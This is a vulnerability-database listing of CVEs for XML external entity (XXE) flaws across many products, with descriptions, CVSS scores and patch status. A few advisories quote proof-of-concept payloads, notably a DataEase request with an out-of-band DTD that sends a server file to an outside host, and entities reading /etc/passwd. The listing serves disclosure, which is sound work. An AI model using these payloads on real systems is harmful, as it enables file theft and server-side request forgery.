Improper Restriction of XML External Entity Reference
CWE-611

CVE IDCVSSVendorExploitPatchTrends
CVE-2024-8602When the XML is read from the codes in the PDF and parsed using a DocumentBuilder, the default settings of the DocumentBuilder allow for an XXE (XML External Entity) attack. Further information on this can be found on the website of the Open Worldwide Application Security Project (OWASP). An attacker could theoretically leverage this by delivering a manipulated PDF file to the target, and depending on the environment, various actions can be executed. These actions include: * Reading files from the operating system * Crashing the thread handling the parsing or causing it to enter an infinite loop * Executing HTTP requests * Loading additional DTDs or XML files * Under certain conditions, executing OS commands
CVSS LowSap

-

-

Trending graph for this CVE
CVE-2024-7098Improper Restriction of XML External Entity Reference vulnerability in SFS Consulting ww.Winsure allows XML Injection.This issue affects ww.Winsure: before 4.6.2.
CVSS 9.8

-

-

Trending graph for this CVE
CVE-2024-6961RAIL documents are an XML-based format invented by Guardrails AI to enforce formatting checks on LLM outputs. Guardrails users that consume RAIL documents from external sources are vulnerable to XXE, which may cause leakage of internal file data via the SYSTEM entity.
CVSS 5.9

-

Patched

Trending graph for this CVE
CVE-2024-6893The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
CVSS 7.5Apache, et al

Exploit

-

Trending graph for this CVE
CVE-2024-5919A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate arbitrary files from firewalls to an attacker controlled server. This attack requires network access to the firewall management interface.
CVSS HIGHPaloaltonetworks

-

-

Trending graph for this CVE
CVE-2024-5625Improper Restriction of XML External Entity Reference vulnerability in PruvaSoft Informatics Apinizer Management Console allows Data Serialization External Entities Blowup.This issue affects Apinizer Management Console: before 2024.05.1.
CVSS 6.5

-

-

Trending graph for this CVE
CVE-2024-52007HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. XSLT parsing performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]> could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML. This is related to GHSA-6cr6-ph3p-f5rf, in which its fix (#1571 & #1717) was incomplete. This issue has been addressed in release version 6.4.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS 8.6Hapifhir

-

Patched

Trending graph for this CVE
CVE-2024-51136An XML External Entity (XXE) vulnerability in Dmoz2CSV in openimaj v1.3.10 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted XML file.
CVSS 9.8

Exploit

-

Trending graph for this CVE
CVE-2024-51132An XML External Entity (XXE) vulnerability in HAPI FHIR before v6.4.0 allows attackers to access sensitive information or execute arbitrary code via supplying a crafted request containing malicious XML entities.
CVSS 9.8Hapifhir

-

Patched

Trending graph for this CVE
CVE-2024-50848An XML External Entity (XXE) vulnerability in the Import object and Translation Memory import functionalities of WorldServer v11.8.2 to access sensitive information and execute arbitrary commands via supplying a crafted .tmx file.
CVSS 6.5Rws

-

-

Trending graph for this CVE
CVE-2024-50442Improper Restriction of XML External Entity Reference vulnerability in WP Royal Royal Elementor Addons allows XML Injection.This issue affects Royal Elementor Addons: from n/a through 1.3.980.
CVSS 7.2Wordpress, et al

-

-

Trending graph for this CVE
CVE-2024-48917PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The `XmlScanner` class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported `CVE-2024-47873`, the regexes from the `findCharSet` method, which is used for determining the current encoding can be bypassed by using a payload in the encoding UTF-7, and adding at end of the file a comment with the value `encoding="UTF-8"` with `"`, which is matched by the first regex, so that `encoding='UTF-7'` with single quotes `'` in the XML header is not matched by the second regex. An attacker can bypass the sanitizer and achieve an XML external entity attack. Versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0 fix the issue.
CVSS 7.5Phpoffice

-

Patched

Trending graph for this CVE
CVE-2024-47873PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the `scan` method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing. An attacker can bypass the sanitizer and achieve an XML external entity attack. Versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0 fix the issue.
CVSS 7.5Phpoffice

-

Patched

Trending graph for this CVE
CVE-2024-46985There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. send request: POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///etc/alpine-release"> <!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>"> After sending the request, the content of the file /etc/alpine-release is successfully read ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 - ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 - Affected versions: <= 2.10.0
CVSS 7.5Dataease

Exploit

Patched

Trending graph for this CVE
CVE-2024-46984The reference validator is a tool to perform advanced validation of FHIR resources for TI applications and interoperability standards. The profile location routine in the referencevalidator commons package is vulnerable to `XML External Entities` attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a `Server Side Request Forgery` attack. The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources. The problem has been patched with the 2.5.1 version of the referencevalidator. Users are strongly recommended to update to this version or a more recent one. A pre-processing or manual analysis of input XML resources on existence of DTD definitions or external entities can mitigate the problem.
CVSS 9.8Fhir, et al

-

Patched

Trending graph for this CVE
CVE-2024-4690Improper Restriction of XML External Entity Reference vulnerability in OpenText Application Automation Tools allows DTD Injection.This issue affects OpenText Application Automation Tools: 24.1.0 and below.
CVSS 8Microfocus, et al

-

Patched

Trending graph for this CVE
CVE-2024-45745TopQuadrant TopBraid EDG before version 8.0.1 allows an authenticated attacker to upload an XML DTD file and execute JavaScript to read local files or access URLs (XXE). Fixed in 8.0.1 (bug fix: TBS-6721).
CVSS 5

-

-

Trending graph for this CVE
CVE-2024-45490An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.
CVSS 7.5Libexpat, et al

-

Patched

Trending graph for this CVE
CVE-2024-45294The HL7 FHIR Core Artifacts repository provides the java core object handling code, with utilities (including validator), for the Fast Healthcare Interoperability Resources (FHIR) specification. Prior to version 6.3.23, XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML. This issue has been patched in release 6.3.23. No known workarounds are available.
CVSS 8.6Hapifhir

-

Patched

Trending graph for this CVE
CVE-2024-45293PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white-spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files and sensitive information can be disclosed by providing a crafted sheet. The security scan function in src/PhpSpreadsheet/Reader/Security/XmlScanner.php contains a flawed XML encoding check to retrieve the input file's XML encoding in the toUtf8 function. The function searches for the XML encoding through a defined regex which looks for `encoding="*"` and/or `encoding='*'`, if not found, it defaults to the UTF-8 encoding which bypasses the conversion logic. This logic can be used to pass a UTF-7 encoded XXE payload, by utilizing a whitespace before or after the = in the attribute definition. Sensitive information disclosure through the XXE on sites that allow users to upload their own excel spreadsheets, and parse them using PHPSpreadsheet's Excel parser. This issue has been addressed in release versions 1.29.1, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS 7.5

-

Patched

Trending graph for this CVE
CVE-2024-45086IBM WebSphere Application Server 8.5 and 9.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A privileged user could exploit this vulnerability to expose sensitive information or consume memory resources.
CVSS 5.5Ibm

-

Patched

Trending graph for this CVE
CVE-2024-45072IBM WebSphere Application Server 8.5 and 9.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A privileged user could exploit this vulnerability to expose sensitive information or consume memory resources.
CVSS 5.5Ibm

-

Patched

Trending graph for this CVE
CVE-2024-45048PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions are subject to a bypassing of a filter which allows for an XXE-attack. This in turn allows attacker to obtain contents of local files, even if error reporting is muted. This vulnerability has been addressed in release version 2.2.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS 6.5Phpspreadsheet project, et al

Exploit

Patched

Trending graph for this CVE
CVE-2024-4357This vulnerability allows remote attackers to disclose sensitive information on affected installations of Progress Software Telerik Reporting. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.<br/>The specific flaw exists within the implementation of ValidateMetadaUri method. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.<br/> Progress Software has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://docs.telerik.com/report-server/knowledge-base/xxe-vulnerability-cve-2024-4357">https://docs.telerik.com/report-server/knowledge-base/xxe-vulnerability-cve-2024-4357</a> <br/></td>
CVSS 6.5Progress

Exploit

-

Trending graph for this CVE
CVE-2024-4189Improper Restriction of XML External Entity Reference vulnerability in OpenText Application Automation Tools allows DTD Injection.This issue affects OpenText Application Automation Tools: 24.1.0 and below.
CVSS 8Microfocus, et al

-

Patched

Trending graph for this CVE
CVE-2024-4184Improper Restriction of XML External Entity Reference vulnerability in OpenText Application Automation Tools allows DTD Injection.This issue affects OpenText Application Automation Tools: 24.1.0 and below.
CVSS 8Microfocus, et al

-

Patched

Trending graph for this CVE
CVE-2024-39726IBM Engineering Lifecycle Optimization - Engineering Insights 7.0.2 and 7.0.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
CVSS 8.2Ibm

-

Patched

Trending graph for this CVE
CVE-2024-3969XML External Entity injection vulnerability found in OpenText™ iManager 3.2.6.0200. This could lead to remote code execution by parsing untrusted XML payload
CVSS 7.8

-

-

Trending graph for this CVE
CVE-2024-39586Dell AppSync Server, version 4.3 through 4.6, contains an XML External Entity Injection vulnerability. An adjacent high privileged attacker could potentially exploit this vulnerability, leading to information disclosure.
CVSS 4.3Dell

-

Patched

Trending graph for this CVE
CVE-2024-3930In versions of Akana API Platform prior to 2024.1.0 a flaw resulting in XML External Entity (XXE) was discovered.
CVSS 9.8Perforce

-

Patched

Trending graph for this CVE
CVE-2024-38653XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.
CVSS 7.5Ivanti

-

Patched

Trending graph for this CVE
CVE-2024-38374Before deserializing CycloneDX Bill of Materials in XML format, cyclonedx-core-java leverages XPath expressions to determine the schema version of the BOM. The DocumentBuilderFactory used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection. XXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.
CVSS 7.5Cyclonedx

-

Patched

Trending graph for this CVE
CVE-2024-37397An External XML Entity (XXE) vulnerability in the provisioning web service of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to leak API secrets.
CVSS 8.2Ivanti

-

-

Trending graph for this CVE
CVE-2024-37388An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of lxml before v4.9.1 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.
CVSS 9.1Dnkorpushov, et al

-

Patched

Trending graph for this CVE
CVE-2024-36827An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.
CVSS 7.5Dnkorpushov

-

Patched

Trending graph for this CVE
CVE-2024-3486XML External Entity injection vulnerability found in OpenText™ iManager 3.2.6.0200. This could lead to information disclosure and remote code execution.
CVSS 7.8

-

-

Trending graph for this CVE
CVE-2024-34345XML External entity injections could be possible, when running the provided XML Validator on arbitrary input. POC const { Spec: { Version }, Validation: { XmlValidator } } = require('@cyclonedx/cyclonedx-library'); const version = Version.v1dot5; const validator = new XmlValidator(version); const input = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE poc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"> <components> <component type="library"> <name>testing</name> <version>1.337</version> <licenses> <license> <id>&xxe;</id><!-- << XML external entity (XXE) injection --> </license> </licenses> </component> </components> </bom>`; // validating this forged(^) input might lead to unintended behaviour // for the fact that the XML external entity would be taken into account. validator.validate(input).then(ve => { console.error('validation error', ve); });
CVSS 8.1Cyclonedx, et al

-

Patched

Trending graph for this CVE
CVE-2024-34102Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
CVSS 9.8Adobe

Exploit

Patched

Trending graph for this CVE
CVE-2024-31139In JetBrains TeamCity before 2024.03 xXE was possible in the Maven build steps detector
CVSS 5.9Jetbrains

-

-

Trending graph for this CVE
CVE-2024-30043This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability.<br/>The specific flaw exists within the BaseXmlDataSource class. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the service account.<br/> Microsoft has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043</a> <br/></td>
CVSS 6.5Microsoft

Exploit

Patched

Trending graph for this CVE
CVE-2024-29010This vulnerability allows remote attackers to disclose sensitive information on affected installations of SonicWALL GMS Virtual Appliance. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.<br/>The specific flaw exists within the ECMPolicyRequest class. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of root.<br/> SonicWALL has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0007">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0007</a> <br/></td>
CVSS 7.1

Exploit

-

Trending graph for this CVE
CVE-2024-2826A vulnerability classified as problematic was found in lakernote EasyAdmin up to 20240315. This vulnerability affects unknown code of the file /ureport/designer/saveReportFile. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257716.
CVSS 6.3

-

-

Trending graph for this CVE
CVE-2024-28198OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication. By manually manipulating http requests when using the draw.io integration it is possible to read arbitrary files as the configured system user and SSRF. The problem is fixed in version 18.1.6 and 18.2.2. It is advised to upgrade to the latest version of 18.1.x or 18.2.x. Users unable to upgrade may work around this issue by disabling the Draw.io module or the entire REST API which will secure the system.
CVSS 4.6Frentix

-

-

Trending graph for this CVE
CVE-2024-28168Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP. This issue affects Apache XML Graphics FOP: 2.9. Users are recommended to upgrade to version 2.10, which fixes the issue.
CVSS 7.5Apache

-

Patched

Trending graph for this CVE
CVE-2024-28039Improper restriction of XML external entity references vulnerability exists in FitNesse all releases, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition.
CVSS 5.8Fitnesse

-

-

Trending graph for this CVE
CVE-2024-27266IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566.
CVSS 8.2Ibm

-

Patched

Trending graph for this CVE
CVE-2024-25971Dell PowerProtect Data Manager, version 19.15, contains an XML External Entity Injection vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to information disclosure, denial-of-service.
CVSS 5.5Dell

-

-

Trending graph for this CVE
CVE-2024-25606XXE vulnerability in Liferay Portal 7.2.0 through 7.4.3.7, and older unsupported versions, and Liferay DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20, and older unsupported versions allows attackers with permission to deploy widgets/portlets/extensions to obtain sensitive information or consume system resources via the Java2WsddTask._format method.
CVSS 8Liferay

-

-

Trending graph for this CVE
CVE-2024-25129The CodeQL CLI repo holds binaries for the CodeQL command line interface (CLI). Prior to version 2.16.3, an XML parser used by the CodeQL CLI to read various auxiliary files is vulnerable to an XML External Entity attack. If a vulnerable version of the CLI is used to process either a maliciously modified CodeQL database, or a specially prepared set of QL query sources, the CLI can be made to make an outgoing HTTP request to an URL that contains material read from a local file chosen by the attacker. This may result in a loss of privacy of exfiltration of secrets. Security researchers and QL authors who receive databases or QL source files from untrusted sources may be impacted. A single untrusted `.ql` or `.qll` file cannot be affected, but a zip archive or tarball containing QL sources may unpack auxiliary files that will trigger an attack when CodeQL sees them in the file system. Those using CodeQL for routine analysis of source trees with a preselected set of trusted queries are not affected. In particular, extracting XML files from a source tree into the CodeQL database does not make one vulnerable. The problem is fixed in release 2.16.3 of the CodeQL CLI. Other than upgrading, workarounds include not accepting CodeQL databases or queries from untrusted sources, or only processing such material on a machine without an Internet connection. Customers who use older releases of CodeQL for security scanning in an automated CI system and cannot upgrade for compliance reasons can continue using that version. That use case is safe. If such customers have a private query pack and use the `codeql pack create` command to precompile them before using them in the CI system, they should be using the production CodeQL release to run `codeql pack create`. That command is safe as long as the QL source it precompiled is trusted. All other development of the query pack should use an upgraded CLI.
CVSS 2.7Microsoft

-

-

Trending graph for this CVE
CVE-2024-24743SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.
CVSS 7.5Sap

-

Patched

Trending graph for this CVE
CVE-2024-23525The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.
CVSS 6.5Tozt

Exploit

-

Trending graph for this CVE
CVE-2024-22380Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
CVSS 5.5Maff

-

-

Trending graph for this CVE
CVE-2024-22354 IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.3 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, or to conduct a server-side request forgery attack. IBM X-Force ID: 280401.
CVSS 7Ibm

-

-

Trending graph for this CVE
CVE-2024-22218XML External Entity (XXE) vulnerability in Terminalfour 8.0.0001 through 8.3.18 and XML JDBC versions up to 1.0.4 allows authenticated users to submit malicious XML via unspecified features which could lead to various actions such as accessing the underlying server, remote code execution (RCE), or performing Server-Side Request Forgery (SSRF) attacks.
CVSS 8.8Terminalfour

-

-

Trending graph for this CVE
CVE-2024-22024An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
CVSS 8.3Ivanti

Exploit

Patched

Trending graph for this CVE
CVE-2024-21796Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
CVSS 5.5Dfeg

-

-

Trending graph for this CVE
CVE-2024-21765Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.
CVSS 5.5Cals-ed

-

-

Trending graph for this CVE
CVE-2024-20531A vulnerability in the API of Cisco ISE could allow an authenticated, remote attacker to read arbitrary files on the underlying operating system of an affected device and conduct a server-side request forgery (SSRF) attack through an affected device. To exploit this vulnerability, the attacker would need valid Super Admin credentials. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing XML input. An attacker could exploit this vulnerability by sending a crafted API request to an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system or conduct an SSRF attack through the affected device.
CVSS 5.5Cisco

-

-

Trending graph for this CVE
CVE-2024-1167This vulnerability allows remote atttackers to disclose sensitive information on affected installations of SEW-EURODRIVE MOVITOOLS MotionStudio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.<br/>The specific flaw exists within the processing of SEWPROJ files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process.<br/> SEW-EURODRIVE has issued an update to correct this vulnerability. More details can be found at: <br/><a href="https://download.sew-eurodrive.com/download/pdf/31965520.pdf">https://download.sew-eurodrive.com/download/pdf/31965520.pdf</a> <br/></td>
CVSS 7.5

Exploit

-

Trending graph for this CVE
CVE-2024-10839Zohocorp ManageEngine SharePoint Manager Plus versions 4503 and prior are vulnerable to authenticated XML External Entity (XXE) in the Management option.
CVSS 8.1Zohocorp

-

Patched

Trending graph for this CVE
CVE-2023-6836Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.
CVSS 4.6Wso2

-

Patched

Trending graph for this CVE
CVE-2023-6721An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system.
CVSS 8.3Europeana

-

-

Trending graph for this CVE
CVE-2023-6280An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network.
CVSS 7.552north

-

-

Trending graph for this CVE
CVE-2023-6194In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.
CVSS 2.8Eclipse

Exploit

Patched

Trending graph for this CVE
CVE-2023-6149 Qualys Jenkins Plugin for WAS prior to version and including 2.0.11 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data
CVSS 6.5Qualys

-

Patched

Trending graph for this CVE
CVE-2023-6147 Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data
CVSS 6.5Qualys

-

Patched

Trending graph for this CVE
CVE-2023-52252Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint.
CVSS 9.8Unifiedremote

Exploit

-

Trending graph for this CVE
CVE-2023-52239The XML parser in Magic xpi Integration Platform 4.13.4 allows XXE attacks, e.g., via onItemImport.
CVSS 6.5Magicsoftware

Exploit

Patched

Trending graph for this CVE
CVE-2023-51605Honeywell Saia PG5 Controls Suite XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Honeywell Saia PG5 Controls Suite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XML files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. Was ZDI-CAN-18644.
CVSS LowHoneywell

-

-

Trending graph for this CVE
CVE-2023-51604Honeywell Saia PG5 Controls Suite XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Honeywell Saia PG5 Controls Suite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XML files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. Was ZDI-CAN-18593.
CVSS LowHoneywell

-

-

Trending graph for this CVE
CVE-2023-51602Honeywell Saia PG5 Controls Suite XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Honeywell Saia PG5 Controls Suite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XML files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. Was ZDI-CAN-18591.
CVSS LowHoneywell

-

-

Trending graph for this CVE
CVE-2023-51601Honeywell Saia PG5 Controls Suite XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Honeywell Saia PG5 Controls Suite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of xml files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. Was ZDI-CAN-18563.
CVSS LowHoneywell

-

-

Trending graph for this CVE
CVE-2023-51600Honeywell Saia PG5 Controls Suite XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Honeywell Saia PG5 Controls Suite. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XML files. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. Was ZDI-CAN-18456.
CVSS LowHoneywell

-

-

Trending graph for this CVE
CVE-2023-51591Voltronic Power ViewPower Pro doDocument XML External Entity Processing Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability. The specific flaw exists within the doDocument method. Due to the improper restriction of XML External Entity (XXE) references, a crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of LOCAL SERVICE. Was ZDI-CAN-22081.
CVSS LowVoltronicpower

-

-

Trending graph for this CVE
CVE-2023-5136An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure. An attacker could exploit this vulnerability by getting a user to open a specially crafted data file.
CVSS 5.5Ni

-

Patched

Trending graph for this CVE
CVE-2023-50380XML External Entity injection in apache ambari versions <= 2.7.7, Users are recommended to upgrade to version 2.7.8, which fixes this issue. More Details: Oozie Workflow Scheduler had a vulnerability that allowed for root-level file reading and privilege escalation from low-privilege users. The vulnerability was caused through lack of proper user input validation. This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. In theory, it might be possible to use this to escalate privileges.
CVSS LowApache

-

Patched

Trending graph for this CVE
CVE-2023-50304IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335.
CVSS 8.2Ibm

-

Patched

Trending graph for this CVE
CVE-2023-50168Pega Platform from 6.x to 8.8.4 is affected by an XXE issue with PDF Generation.
CVSS 7.7Pega

-

-

Trending graph for this CVE
